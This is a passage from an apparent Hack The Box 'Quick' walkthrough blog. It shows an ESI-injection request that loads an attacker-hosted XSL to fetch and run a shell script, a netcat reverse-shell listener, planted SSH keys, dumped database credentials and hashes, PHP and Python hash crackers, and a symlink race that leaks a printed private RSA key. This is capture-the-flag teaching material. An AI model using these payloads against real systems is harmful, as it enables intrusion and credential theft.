</pre></table></code></div></div><p>now , if you go to your webserver you can see that <code class="highlighter-rouge">shell.sh</code> has been successfull uploaded to the box</p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre>root@kali:~/Desktop/hacktheboxmachine/quick# php -S 10.10.16.81:80
PHP 7.3.15-3 Development Server started at Tue May  5 17:15:30 2020
Listening on http://10.10.16.81:80
Document root is /root/Desktop/hacktheboxmachine/quick
Press Ctrl-C to quit.
[Tue May  5 17:15:42 2020] 10.10.10.186:42540 [200]: /upload.xsl
[Tue May  5 17:15:43 2020] 10.10.10.186:42544 [200]: /shell.sh
</pre></table></code></div></div><p>before you excute the shell , listen to port <code class="highlighter-rouge">4444</code> by running <code class="highlighter-rouge">rlwrap nc -vlp 4444</code><br /> go again to burp and send the <code class="highlighter-rouge">shell.xsl</code></p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre><td class="rouge-code"><pre>POST /ticket.php HTTP/1.1
Host: quick.htb:9001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://quick.htb:9001/ticket.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 136
Connection: close
Cookie: PHPSESSID=42p7fc3ho6b5aklgf9ld77hm2r
Upgrade-Insecure-Requests: 1

title=test&amp;msg=test&amp;id=&lt;esi:include src="http://10.10.10.186:9001/home.php"
stylesheet="http://10.10.16.81:80/shell.xsl"&gt;&lt;/esi:include&gt;
</pre></table></code></div></div><h2 id="get-user">Get user</h2><p>go to your <code class="highlighter-rouge">listener</code> and you should receive a shell<br /></p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre><td class="rouge-code"><pre>root@kali:~/Desktop/hacktheboxmachine/quick# rlwrap nc -vlp 4444
listening on [any] 4444 ...
connect to [10.10.16.81] from quick.htb [10.10.10.186] 36048
/bin/sh: 0: can't access tty; job control turned off
$ bash -i
bash: cannot set terminal process group (1032): Inappropriate ioctl for device
bash: no job control in this shell
sam@quick:~$ wc -c user.txt
wc -c user.txt
33 user.txt
sam@quick:~$
</pre></table></code></div></div><p>As usual , i preafer to get ssh</p><blockquote><p>in your kali generate public/private id_rsa key</p></blockquote><p>command : <code class="highlighter-rouge">ssh-keygen</code> then get your public id key : <code class="highlighter-rouge">cat ~/.ssh/id_rsa.pub</code><br /></p><blockquote><p>in the box</p></blockquote><p>i need to write the public key to the box<br /></p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>mkdir .ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDdFvUo307i6hP7QdBht4+MOFnqEArXRmA9PeR+e4j2cp9VIgmOmrPT74GgyHacENjiHAgaa7ZmxjoRLMrUAfFiJSYdO4KgXkcf7d7mQLE9D8VQZjJeaWM5XK+uQotcIAYL0fl9LWJ3kaJdX8cak0T7zUM6HFcWCdrXmXQ4RQ0Szb4DgZQH7iHqjYFt3Q77E90jgzl8uw0DUrXT+XhM23fMMTz60ao985T+YOxpbsIAD8TAgM32BK17bwuRuSBtqO8ZqDkWAcwrHyqV2Wk9is1HHecjm98Yd1y0FV2YoYxPDLJPhz4UbDTnADvruOF6pGNt3NGg1QRjJY2DAVbOKIB4YJ+GfQhNuDtaOOoyWo3smOWd8syTfo03CoX68KFKT7N2h+hqEot1PuyCsWNiIRkypsLa/tSp7K/J0xxITyyt4+3xVrNnRUxYX5j+canjDIhIqEGVM2qzBOxbSWCC6hocKKywbL8Zw9IHv1rO830xYp5yCY3BrmR9IEHdP+WOFLM= root@kali" &gt; ~/.ssh/authorized_keys
</pre></table></code></div></div><p>assign correct permission: <code class="highlighter-rouge">chmod 600 ~/.ssh/authorized_keys &amp;&amp; chmod 700 ~/.ssh</code> <br /> i can ssh to the box now :</p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>ssh -i /root/.ssh/id_rsa sam@quick.htb
</pre></table></code></div></div><h2 id="escalate-to-srvadm">escalate to srvadm</h2><p>i enumerated a little and found a MySql server running locally in port <code class="highlighter-rouge">3306</code> by checking the running services with <code class="highlighter-rouge">netstat -antp</code></p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
</pre><td class="rouge-code"><pre>sam@quick:~$ netstat -antp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:80            0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:42641         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 10.10.10.186:34102      10.10.14.40:4444        CLOSE_WAIT  20340/bash          
tcp        0      1 10.10.10.186:56204      8.8.8.8:53              SYN_SENT    -                   
tcp        0      0 10.10.10.186:22         10.10.16.81:32870       ESTABLISHED -                   
tcp        0      0 10.10.10.186:34620      10.10.14.40:4444        CLOSE_WAIT  21957/bash          
tcp        0    324 10.10.10.186:22         10.10.16.81:34204       ESTABLISHED -                   
tcp        0      0 10.10.10.186:36048      10.10.16.81:4444        ESTABLISHED 24318/nc            
tcp6       0      0 :::9001                 :::*                    LISTEN      1099/java           
tcp6       0      0 127.0.0.1:8081          :::*                    LISTEN      1099/java           
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 10.10.10.186:9001       10.10.10.186:54514      FIN_WAIT2   1099/java           
tcp6       1      0 127.0.0.1:45396         127.0.0.1:80            CLOSE_WAIT  1099/java           
tcp6       1      0 10.10.10.186:54514      10.10.10.186:9001       CLOSE_WAIT  1099/java     
</pre></table></code></div></div><p>tried to connect , creds are required , so it’s time to use the <code class="highlighter-rouge">db.php</code> found with gobuster , of course it’s in the web directory</p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>cat /var/www/html/db.php
</pre></table></code></div></div><div class="language-php highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre><span class="cp">&lt;?php</span>
<span class="nv">$conn</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">mysqli</span><span class="p">(</span><span class="s2">"localhost"</span><span class="p">,</span><span class="s2">"db_adm"</span><span class="p">,</span><span class="s2">"db_p4ss"</span><span class="p">,</span><span class="s2">"quick"</span><span class="p">);</span>
<span class="cp">?&gt;</span>
</pre></table></code></div></div><h3 id="dumping-creds">dumping creds</h3><p>now i have database creds so i can connect</p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>mysql -h 127.0.0.1 -u db_adm -p -D quick
</pre></table></code></div></div><p>Now to get tables in the <code class="highlighter-rouge">quick</code> database run <code class="highlighter-rouge">show tables;</code> <br /></p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre>mysql&gt; show tables;
+-----------------+
| Tables_in_quick |
+-----------------+
| jobs            |
| tickets         |
| users           |
+-----------------+
3 rows in set (0.00 sec)
</pre></table></code></div></div><p><code class="highlighter-rouge">users</code> table seem interesting so let’s select the content of the table by running <code class="highlighter-rouge">select * from users;</code></p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre><td class="rouge-code"><pre>mysql&gt; select * from users;
+--------------+------------------+----------------------------------+
| name         | email            | password                         |
+--------------+------------------+----------------------------------+
| Elisa        | elisa@wink.co.uk | c6c35ae1f3cb19438e0199cfa72a9d9d |
| Server Admin | srvadm@quick.htb | e626d51f8fbfd1124fdea88396c35d05 |
+--------------+------------------+----------------------------------+
2 rows in set (0.00 sec)
</pre></table></code></div></div><p>by checking <code class="highlighter-rouge">/etc/passwd</code> i see that the user <code class="highlighter-rouge">srvadm</code> have a <code class="highlighter-rouge">/bin/bash</code> so i can login with this user using ssh</p><h3 id="craking-the-hash">Craking the hash</h3><p>i tried to crack this hash with <code class="highlighter-rouge">john</code> but not working , also tried the <a href="https://crackstation.net/">crackstation</a> but no luck … <br /> There is a hash for <code class="highlighter-rouge">elisa</code> and elisa is a web user so if i check the <code class="highlighter-rouge">index.php</code> i can see how the hash is generated.</p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>cat /var/www/html/login.php
</pre></table></code></div></div><div class="language-php highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
</pre><td class="rouge-code"><pre><span class="cp">&lt;?php</span> 
<span class="k">include</span><span class="p">(</span><span class="s2">"db.php"</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="nb">isset</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s2">"email"</span><span class="p">])</span> <span class="o">&amp;&amp;</span> <span class="nb">isset</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s2">"password"</span><span class="p">]))</span>
<span class="p">{</span>
  <span class="nv">$email</span><span class="o">=</span><span class="nv">$_POST</span><span class="p">[</span><span class="s2">"email"</span><span class="p">];</span>
  <span class="nv">$password</span> <span class="o">=</span> <span class="nv">$_POST</span><span class="p">[</span><span class="s2">"password"</span><span class="p">];</span>
  <span class="nv">$password</span> <span class="o">=</span> <span class="nb">md5</span><span class="p">(</span><span class="nb">crypt</span><span class="p">(</span><span class="nv">$password</span><span class="p">,</span><span class="s1">'fa'</span><span class="p">));</span>
        <span class="nv">$stmt</span><span class="o">=</span><span class="nv">$conn</span><span class="o">-&gt;</span><span class="na">prepare</span><span class="p">(</span><span class="s2">"select email,password from users where email=? and password=?"</span><span class="p">);</span>
        <span class="nv">$stmt</span><span class="o">-&gt;</span><span class="na">bind_param</span><span class="p">(</span><span class="s2">"ss"</span><span class="p">,</span><span class="nv">$email</span><span class="p">,</span><span class="nv">$password</span><span class="p">);</span>
        <span class="nv">$stmt</span><span class="o">-&gt;</span><span class="na">execute</span><span class="p">();</span>
        <span class="nv">$result</span> <span class="o">=</span> <span class="nv">$stmt</span><span class="o">-&gt;</span><span class="na">get_result</span><span class="p">();</span>
        <span class="nv">$num_rows</span> <span class="o">=</span> <span class="nv">$result</span><span class="o">-&gt;</span><span class="na">num_rows</span><span class="p">;</span>
        <span class="k">if</span><span class="p">(</span><span class="nv">$num_rows</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">)</span>
  <span class="p">{</span>
    <span class="nb">session_start</span><span class="p">();</span>
    <span class="nv">$_SESSION</span><span class="p">[</span><span class="s2">"loggedin"</span><span class="p">]</span><span class="o">=</span><span class="nv">$email</span><span class="p">;</span>
    <span class="nb">header</span><span class="p">(</span><span class="s2">"location: home.php"</span><span class="p">);</span>
  <span class="p">}</span>
  <span class="k">else</span>
  <span class="p">{</span>
    <span class="k">echo</span> <span class="s1">'&lt;script&gt;alert("Invalid Credentials");window.location.href="/login.php";&lt;/script&gt;'</span><span class="p">;</span>
  <span class="p">}</span>
<span class="p">}</span>
</pre></table></code></div></div><p><code class="highlighter-rouge">john</code> can’t crack it because the hash is salted: <code class="highlighter-rouge">$password = md5(crypt($password,'fa'));</code>. I need to write a simple <code class="highlighter-rouge">php</code> to decrypt the password</p><div class="language-php highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
</pre><td class="rouge-code"><pre><span class="cp">&lt;?php</span>
<span class="nv">$handle</span> <span class="o">=</span> <span class="nb">fopen</span><span class="p">(</span><span class="s2">"/usr/share/wordlists/rockyou.txt"</span><span class="p">,</span> <span class="s2">"r"</span><span class="p">);</span>
<span class="nv">$srvadm_hash</span> <span class="o">=</span> <span class="s2">"e626d51f8fbfd1124fdea88396c35d05"</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="nv">$handle</span><span class="p">)</span> <span class="p">{</span>
    <span class="nv">$line</span> <span class="o">=</span> <span class="nb">fgets</span><span class="p">(</span><span class="nv">$handle</span><span class="p">);</span>
    <span class="nv">$line</span> <span class="o">=</span> <span class="nb">trim</span><span class="p">(</span><span class="nv">$line</span><span class="p">);</span>
    <span class="k">while</span> <span class="p">(</span><span class="nv">$line</span> <span class="o">!==</span> <span class="kc">false</span><span class="p">)</span> <span class="p">{</span>
        <span class="nv">$line</span> <span class="o">=</span> <span class="nb">fgets</span><span class="p">(</span><span class="nv">$handle</span><span class="p">);</span>
  <span class="nv">$line</span> <span class="o">=</span> <span class="nb">trim</span><span class="p">(</span><span class="nv">$line</span><span class="p">);</span>
  <span class="k">if</span><span class="p">((</span><span class="nb">md5</span><span class="p">(</span><span class="nb">crypt</span><span class="p">(</span><span class="nv">$line</span><span class="p">,</span> <span class="s1">'fa'</span><span class="p">)))</span> <span class="o">==</span> <span class="nv">$srvadm_hash</span><span class="p">){</span>
    <span class="k">echo</span> <span class="s2">"done ! password:  "</span><span class="p">;</span>
    <span class="k">echo</span> <span class="nv">$line</span><span class="p">;</span>
  <span class="p">}</span>
    <span class="p">}</span>
    <span class="nb">fclose</span><span class="p">(</span><span class="nv">$handle</span><span class="p">);</span>
<span class="p">}</span>
<span class="cp">?&gt;</span>
</pre></table></code></div></div><p>this code will read passwords from <code class="highlighter-rouge">rockyou.txt</code> then encrypt it and compare the hash , if he find the same hash so i got the <code class="highlighter-rouge">password</code>.<br /> if you are not familiar with <code class="highlighter-rouge">php</code> , i wrote another code in <code class="highlighter-rouge">python</code></p><div class="language-python highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
</pre><td class="rouge-code"><pre><span class="kn">import</span> <span class="nn">hashlib</span>
<span class="kn">import</span> <span class="nn">crypt</span>
<span class="n">adm_hash</span> <span class="o">=</span> <span class="s">"e626d51f8fbfd1124fdea88396c35d05"</span>
<span class="k">try</span><span class="p">:</span>
    <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s">'/usr/share/wordlists/rockyou.txt'</span><span class="p">,</span> <span class="s">'r'</span><span class="p">)</span> <span class="k">as</span> <span class="n">infile</span><span class="p">:</span>
        <span class="k">for</span> <span class="n">myline</span> <span class="ow">in</span> <span class="n">infile</span><span class="p">:</span>
            <span class="n">myline</span> <span class="o">=</span> <span class="n">myline</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span>
      <span class="n">m</span> <span class="o">=</span> <span class="n">hashlib</span><span class="o">.</span><span class="n">md5</span><span class="p">()</span>
      <span class="n">m</span><span class="o">.</span><span class="n">update</span><span class="p">(</span><span class="n">crypt</span><span class="o">.</span><span class="n">crypt</span><span class="p">(</span><span class="n">myline</span><span class="p">,</span><span class="s">"fa"</span><span class="p">))</span>
      <span class="k">if</span> <span class="n">m</span><span class="o">.</span><span class="n">hexdigest</span><span class="p">()</span> <span class="o">==</span> <span class="n">adm_hash</span><span class="p">:</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"password: "</span><span class="o">+</span><span class="n">myline</span><span class="p">)</span>
    <span class="nb">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="k">except</span> <span class="nb">IOError</span><span class="p">:</span>
       <span class="k">print</span> <span class="s">'error opening file'</span>
</pre></table></code></div></div><p>running the code gives me <code class="highlighter-rouge">yl51pbx</code> as password.<br /></p><h3 id="get-id_rsa-of-srvadm-user">Get id_rsa of srvadm user</h3><p>I tried to shh with this password but not working ,probably it’s a web user so i enumerated document root , maybe i can find a new hidden website.<br /> let’s check the apache config file</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nb">cat</span> /etc/apache2/sites-available/000-default.conf
</pre></table></code></div></div><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre>&lt;VirtualHost *:80&gt;
  AssignUserId srvadm srvadm
  ServerName printerv2.quick.htb
  DocumentRoot /var/www/printer
&lt;/VirtualHost&gt;
</pre></table></code></div></div><p>a new virtual host appear: <code class="highlighter-rouge">printerv2.quick.htb</code> with DocumentRoot <code class="highlighter-rouge">/var/www/printer</code>.Add this link to your host file and try to browse for it.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nb">echo</span> <span class="s2">"10.10.10.186  printerv2.quick.htb"</span> <span class="o">&gt;&gt;</span> /etc/hosts
</pre></table></code></div></div><p>go to <code class="highlighter-rouge">http://printerv2.quick.htb:9001/</code> and login with <code class="highlighter-rouge">srvadm@quick.htb</code> and <code class="highlighter-rouge">yl51pbx</code> <img class="lozad" src= /assets/img/commons/loading.png data-src="https://raw.githubusercontent.com/0xyassine/0xyassine.github.io/master/assets/img/htb/quick/printer.jpg" alt="info" /> two interesting things ,<code class="highlighter-rouge">add_printer.php</code> and <code class="highlighter-rouge">printers.php</code> .<br /> when i add a printer , it require a job to run so i need to understand what the <code class="highlighter-rouge">job</code> is doing. <br /> i need to check the job.php inside <code class="highlighter-rouge">/var/www/printer</code></p><div class="language-php highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
</pre><td class="rouge-code"><pre><span class="k">if</span><span class="p">(</span><span class="nv">$_SESSION</span><span class="p">[</span><span class="s2">"loggedin"</span><span class="p">])</span>
<span class="p">{</span>
  <span class="k">if</span><span class="p">(</span><span class="nb">isset</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s2">"submit"</span><span class="p">]))</span>
  <span class="p">{</span>
    <span class="nv">$title</span><span class="o">=</span><span class="nv">$_POST</span><span class="p">[</span><span class="s2">"title"</span><span class="p">];</span>
    <span class="nv">$file</span> <span class="o">=</span> <span class="nb">date</span><span class="p">(</span><span class="s2">"Y-m-d_H:i:s"</span><span class="p">);</span>
    <span class="nb">file_put_contents</span><span class="p">(</span><span class="s2">"/var/www/jobs/"</span><span class="o">.</span><span class="nv">$file</span><span class="p">,</span><span class="nv">$_POST</span><span class="p">[</span><span class="s2">"desc"</span><span class="p">]);</span>
    <span class="nb">chmod</span><span class="p">(</span><span class="s2">"/var/www/printer/jobs/"</span><span class="o">.</span><span class="nv">$file</span><span class="p">,</span><span class="s2">"0777"</span><span class="p">);</span>
    <span class="nv">$stmt</span><span class="o">=</span><span class="nv">$conn</span><span class="o">-&gt;</span><span class="na">prepare</span><span class="p">(</span><span class="s2">"select ip,port from jobs"</span><span class="p">);</span>
    <span class="nv">$stmt</span><span class="o">-&gt;</span><span class="na">execute</span><span class="p">();</span>
    <span class="nv">$result</span><span class="o">=</span><span class="nv">$stmt</span><span class="o">-&gt;</span><span class="na">get_result</span><span class="p">();</span>
    <span class="k">if</span><span class="p">(</span><span class="nv">$result</span><span class="o">-&gt;</span><span class="na">num_rows</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">)</span>
    <span class="p">{</span>
      <span class="nv">$row</span><span class="o">=</span><span class="nv">$result</span><span class="o">-&gt;</span><span class="na">fetch_assoc</span><span class="p">();</span>
      <span class="nv">$ip</span><span class="o">=</span><span class="nv">$row</span><span class="p">[</span><span class="s2">"ip"</span><span class="p">];</span>
      <span class="nv">$port</span><span class="o">=</span><span class="nv">$row</span><span class="p">[</span><span class="s2">"port"</span><span class="p">];</span>
      <span class="k">try</span>
      <span class="p">{</span>
        <span class="nv">$connector</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">NetworkPrintConnector</span><span class="p">(</span><span class="nv">$ip</span><span class="p">,</span><span class="nv">$port</span><span class="p">);</span>
        <span class="nb">sleep</span><span class="p">(</span><span class="mf">0.5</span><span class="p">);</span> <span class="c1">//Buffer for socket check</span>
        <span class="nv">$printer</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">Printer</span><span class="p">(</span><span class="nv">$connector</span><span class="p">);</span>
        <span class="nv">$printer</span> <span class="o">-&gt;</span> <span class="na">text</span><span class="p">(</span><span class="nb">file_get_contents</span><span class="p">(</span><span class="s2">"/var/www/jobs/"</span><span class="o">.</span><span class="nv">$file</span><span class="p">));</span>
        <span class="nv">$printer</span> <span class="o">-&gt;</span> <span class="na">cut</span><span class="p">();</span>
        <span class="nv">$printer</span> <span class="o">-&gt;</span> <span class="na">close</span><span class="p">();</span>
        <span class="nv">$message</span><span class="o">=</span><span class="s2">"Job assigned"</span><span class="p">;</span>
        <span class="nb">unlink</span><span class="p">(</span><span class="s2">"/var/www/jobs/"</span><span class="o">.</span><span class="nv">$file</span><span class="p">);</span>
      <span class="p">}</span>
      <span class="k">catch</span><span class="p">(</span><span class="nx">Exception</span> <span class="nv">$error</span><span class="p">)</span> 
      <span class="p">{</span>
        <span class="nv">$error</span><span class="o">=</span><span class="s2">"Can't connect to printer."</span><span class="p">;</span>
        <span class="nb">unlink</span><span class="p">(</span><span class="s2">"/var/www/jobs/"</span><span class="o">.</span><span class="nv">$file</span><span class="p">);</span>
      <span class="p">}</span>
    <span class="p">}</span>
    <span class="k">else</span>
    <span class="p">{</span>
      <span class="nv">$error</span><span class="o">=</span><span class="s2">"Couldn't find printer."</span><span class="p">;</span>
    <span class="p">}</span>
  <span class="p">}</span>
</pre></table></code></div></div><p>He is creating a file named as the box time <code class="highlighter-rouge">$file = date("Y-m-d_H:i:s");</code> and assign a <code class="highlighter-rouge">0777</code> permission for it and place it in <code class="highlighter-rouge">/var/www/printer/jobs/</code> then he will connect to <code class="highlighter-rouge">ip</code> and <code class="highlighter-rouge">port</code> so i can use my <code class="highlighter-rouge">vpn</code> ip and setup a listener to get response back, and if i <code class="highlighter-rouge">link</code> this file to the <code class="highlighter-rouge">id_rsa</code> of <code class="highlighter-rouge">srvadm</code> user and excute the job , i should receive the <code class="highlighter-rouge">id_rsa</code> in my listener. I created a simple <code class="highlighter-rouge">bash</code> script that watch the content of <code class="highlighter-rouge">/var/www/printer/jobs/</code> and is a file is created he will link it immediately. Name this file as <code class="highlighter-rouge">link.sh</code></p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre><td class="rouge-code"><pre><span class="c">#!/bin/bash</span>
<span class="nb">cd</span> /var/www/jobs<span class="p">;</span>
<span class="k">while </span><span class="nb">true</span><span class="p">;</span> <span class="k">do
  for </span>i <span class="k">in</span> <span class="si">$(</span><span class="nb">ls</span><span class="si">)</span><span class="p">;</span> <span class="k">do
    </span><span class="nb">rm</span> <span class="nt">-rf</span> <span class="nv">$i</span><span class="p">;</span>
    <span class="nb">ln</span> <span class="nt">-s</span> /home/srvadm/.ssh/id_rsa <span class="nv">$i</span><span class="p">;</span>
  <span class="k">done
done</span>
</pre></table></code></div></div><p>Let’s add a new printer.<br /> First listen to port <code class="highlighter-rouge">4444</code> by running <code class="highlighter-rouge">rlwrap nc -vlp 4444</code><br /> add the printer<br /> <img class="lozad" src= /assets/img/commons/loading.png data-src="https://raw.githubusercontent.com/0xyassine/0xyassine.github.io/master/assets/img/htb/quick/print.jpg" alt="info" /> press print icon you get <code class="highlighter-rouge">Please add a job</code><br /> <img class="lozad" src= /assets/img/commons/loading.png data-src="https://raw.githubusercontent.com/0xyassine/0xyassine.github.io/master/assets/img/htb/quick/jobs.jpg" alt="info" /> you will notice that you received a connection and <code class="highlighter-rouge">disconnected</code> so run your listener again.<br /> In the box run the <code class="highlighter-rouge">link.sh</code> then go to website and press <code class="highlighter-rouge">print</code> <img class="lozad" src= /assets/img/commons/loading.png data-src="https://raw.githubusercontent.com/0xyassine/0xyassine.github.io/master/assets/img/htb/quick/done.jpg" alt="info" /> in your listener you should receive the id_rsa<br /></p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
</pre><td class="rouge-code"><pre>root@kali:~/Desktop/hacktheboxmachine/quick# rlwrap nc -vlp 4444
listening on [any] 4444 ...
connect to [10.10.16.81] from quick.htb [10.10.10.186] 37242
root@kali:~/Desktop/hacktheboxmachine/quick# rlwrap nc -vlp 4444
listening on [any] 4444 ...
connect to [10.10.16.81] from quick.htb [10.10.10.186] 37288
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAutSlpZLFoQfbaRT7O8rP8LsjE84QJPeWQJji6MF0S/RGCd4P
AP1UWD26CAaDy4J7B2f5M/o5XEYIZeR+KKSh+mD//FOy+O3sqIX37anFqqvhJQ6D
1L2WOskWoyZzGqb8r94gN9TXW8TRlz7hMqq2jfWBgGm3YVzMKYSYsWi6dVYTlVGY
DLNb/88agUQGR8cANRis/2ckWK+GiyTo5pgZacnSN/61p1Ctv0IC/zCOI5p9CKnd
whOvbmjzNvh/b0eXbYQ/Rp5ryLuSJLZ1aPrtK+LCnqjKK0hwH8gKkdZk/d3Ofq4i
hRiQlakwPlsHy2am1O+smg0214HMyQQdn7lE9QIDAQABAoIBAG2zSKQkvxgjdeiI
ok/kcR5ns1wApagfHEFHxAxo8vFaN/m5QlQRa4H4lI/7y00mizi5CzFC3oVYtbum
Y5FXwagzZntxZegWQ9xb9Uy+X8sr6yIIGM5El75iroETpYhjvoFBSuedeOpwcaR+
DlritBg8rFKLQFrR0ysZqVKaLMmRxPutqvhd1vOZDO4R/8ZMKggFnPC03AkgXkp3
j8+ktSPW6THykwGnHXY/vkMAS2H3dBhmecA/Ks6V8h5htvybhDLuUMd++K6Fqo/B
H14kq+y0Vfjs37vcNR5G7E+7hNw3zv5N8uchP23TZn2MynsujZ3TwbwOV5pw/CxO
9nb7BSECgYEA5hMD4QRo35OwM/LCu5XCJjGardhHn83OIPUEmVePJ1SGCam6oxvc
bAA5n83ERMXpDmE4I7y3CNrd9DS/uUae9q4CN/5gjEcc9Z1E81U64v7+H8VK3rue
F6PinFsdov50tWJbxSYr0dIktSuUUPZrR+in5SOzP77kxZL4QtRE710CgYEAz+It
T/TMzWbl+9uLAyanQObr5gD1UmG5fdYcutTB+8JOXGKFDIyY+oVMwoU1jzk7KUtw
8MzyuG8D1icVysRXHU8btn5t1l51RXu0HsBmJ9LaySWFRbNt9bc7FErajJr8Dakj
b4gu9IKHcGchN2akH3KZ6lz/ayIAxFtadrTMinkCgYEAxpZzKq6btx/LX4uS+kdx
pXX7hULBz/XcjiXvKkyhi9kxOPX/2voZcD9hfcYmOxZ466iOxIoHkuUX38oIEuwa
GeJol9xBidN386kj8sUGZxiiUNoCne5jrxQObddX5XCtXELh43HnMNyqQpazFo8c
Wp0/DlGaTtN+s+r/zu9Z8SECgYEAtfvuZvyK/ZWC6AS9oTiJWovNH0DfggsC82Ip
LHVsjBUBvGaSyvWaRlXDaNZsmMElRXVBncwM/+BPn33/2c4f5QyH2i67wNpYF0e/
2tvbkilIVqZ+ERKOxHhvQ8hzontbBCp5Vv4E/Q/3uTLPJUy5iL4ud7iJ8SOHQF4o
x5pnJSECgYEA4gk6oVOHMVtxrXh3ASZyQIn6VKO+cIXHj72RAsFAD/98intvVsA3
+DvKZu+NeroPtaI7NZv6muiaK7ZZgGcp4zEHRwxM+xQvxJpd3YzaKWZbCIPDDT/u
NJx1AkN7Gr9v4WjccrSk1hitPE1w6cmBNStwaQWD+KUUEeWYUAx20RA=
-----END RSA PRIVATE KEY-----
</pre></table></code></div></div><p>Finally i can ssh with id_rsa.Save it as <code class="highlighter-rouge">adm_id</code><br /></p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nb">chmod </span>600 adm_id
